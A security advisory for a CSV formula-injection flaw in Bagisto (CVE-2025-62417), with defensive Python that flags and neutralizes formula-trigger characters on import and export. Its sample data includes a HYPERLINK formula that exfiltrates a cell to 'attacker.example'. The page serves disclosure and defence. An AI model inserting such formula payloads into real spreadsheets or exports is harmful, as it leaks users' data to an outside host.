PT-2025-42536 · Bagisto · Bagisto

Published 2025-10-16 · Updated 2025-10-17 · CVE-2025-62417

CVSS v3.1: 9.0 (Critical)
Vector: AV:N/AC:L/PR:L/UI:R/S:C/C:H/I:H/A:H
Name of the Vulnerable Software and Affected Versions
Bagisto versions prior to 2.3.8

Description
The application does not neutralize or escape leading formula characters when generating CSV files or accepting CSV import fields. An attacker with access to product editing (the vector reflects low privileges plus a required user interaction) can set a field such as the product name to a value that begins with a spreadsheet formula character (for example =, +, - or @). The value is accepted unchanged and later exported or saved into a CSV file. When a user opens that file in spreadsheet software, the spreadsheet interprets and evaluates the cell as a formula, which can lead to data exfiltration and, with older Excel versions or macro-enabled workbooks, to remote command execution. The affected endpoint is '/admin/catalog/products/edit/1'; the vulnerable parameter is the product name field.

Recommendations
Update Bagisto to version 2.3.8 or later.
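The following Python is an added example written for this page, not Bagisto's own code, showing the two neutralization points the description refers to: flagging values that start with a formula trigger when a record is imported or edited, and prefixing such values with a single quote and quoting every field when exporting to CSV. Python is used because the behaviour does not depend on the application stack. The product records are constructed sample data, and the HYPERLINK payload is a generic formula-injection illustration, not a reproduction of the reported exploit; the trigger set follows OWASP's CSV injection guidance and includes tab and carriage return beyond the four characters named above.

```python
import csv
import io

# Leading characters that Excel, LibreOffice Calc and Google Sheets treat as
# the start of a formula. Tab and carriage return are included because they
# also trigger evaluation in some versions (OWASP CSV injection guidance).
FORMULA_TRIGGERS = ("=", "+", "-", "@", "\t", "\r")


def is_formula_like(value: str) -> bool:
    """Return True if a spreadsheet could evaluate this cell as a formula.

    Leading spaces are stripped first. That is a conservative choice: it
    costs only an extra quote on rare values such as "  -5" but guards
    against import paths that trim whitespace before evaluation.
    """
    return value.lstrip(" ").startswith(FORMULA_TRIGGERS)


def neutralize_cell(value: str) -> str:
    """Defang a single value for CSV export.

    A leading apostrophe makes spreadsheet software read the cell as text
    while leaving the original characters intact for the reader. Combined
    with full quoting (see export_products_csv) an attacker cannot break
    out of the field to start a new, unprefixed cell.
    """
    return "'" + value if is_formula_like(value) else value


def reject_formula_fields(row: dict) -> list:
    """Import-side check: names of string fields that start with a trigger.

    An importer may either reject the row or store it and rely on export
    neutralization; flagging at input is the stricter of the two.
    """
    return [k for k, v in row.items() if isinstance(v, str) and is_formula_like(v)]


def export_products_csv(products: list) -> str:
    """Serialise product records to CSV with every cell neutralized and quoted."""
    buf = io.StringIO()
    writer = csv.DictWriter(buf, fieldnames=["id", "name", "sku"],
                            quoting=csv.QUOTE_ALL)
    writer.writeheader()
    for product in products:
        writer.writerow({k: neutralize_cell(str(v)) for k, v in product.items()})
    return buf.getvalue()


# Constructed sample records (not real Bagisto data). Record 2 carries a
# generic formula-injection payload; record 3 is a legitimate value that
# happens to start with "-", which is why export prefixes rather than drops.
SAMPLE_PRODUCTS = [
    {"id": 1, "name": "Plain T-shirt", "sku": "TS-001"},
    {"id": 2, "name": '=HYPERLINK("https://attacker.example/?d="&A1,"open")', "sku": "TS-002"},
    {"id": 3, "name": "-10% off hoodie", "sku": "HD-003"},
    {"id": 4, "name": "@home desk", "sku": "DK-004"},
]


def neutralized_names(products: list) -> list:
    """Parse the exported CSV back and return the name column, for inspection."""
    rows = list(csv.reader(io.StringIO(export_products_csv(products))))
    return [row[1] for row in rows[1:]]


if __name__ == "__main__":
    for product in SAMPLE_PRODUCTS:
        flagged = reject_formula_fields(product)
        print(f"product {product['id']}: flagged fields {flagged or 'none'}")
    print(export_products_csv(SAMPLE_PRODUCTS))
```

The apostrophe prefix is only safe together with quoting: if fields were written unquoted, a value containing a comma could end the cell early and start a fresh, unprefixed one. Rejecting at input is stricter but breaks legitimate names such as "-10% off hoodie", so many applications accept the value and neutralize on every export path instead; whichever is chosen, both the CSV import and the export must be covered.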

Tags: Exploit · Fix · RCE

Weakness Enumeration

Related Identifiers

CVE-2025-62417
GHSA-JQRP-58FV-W8CQ

Affected Products

Bagisto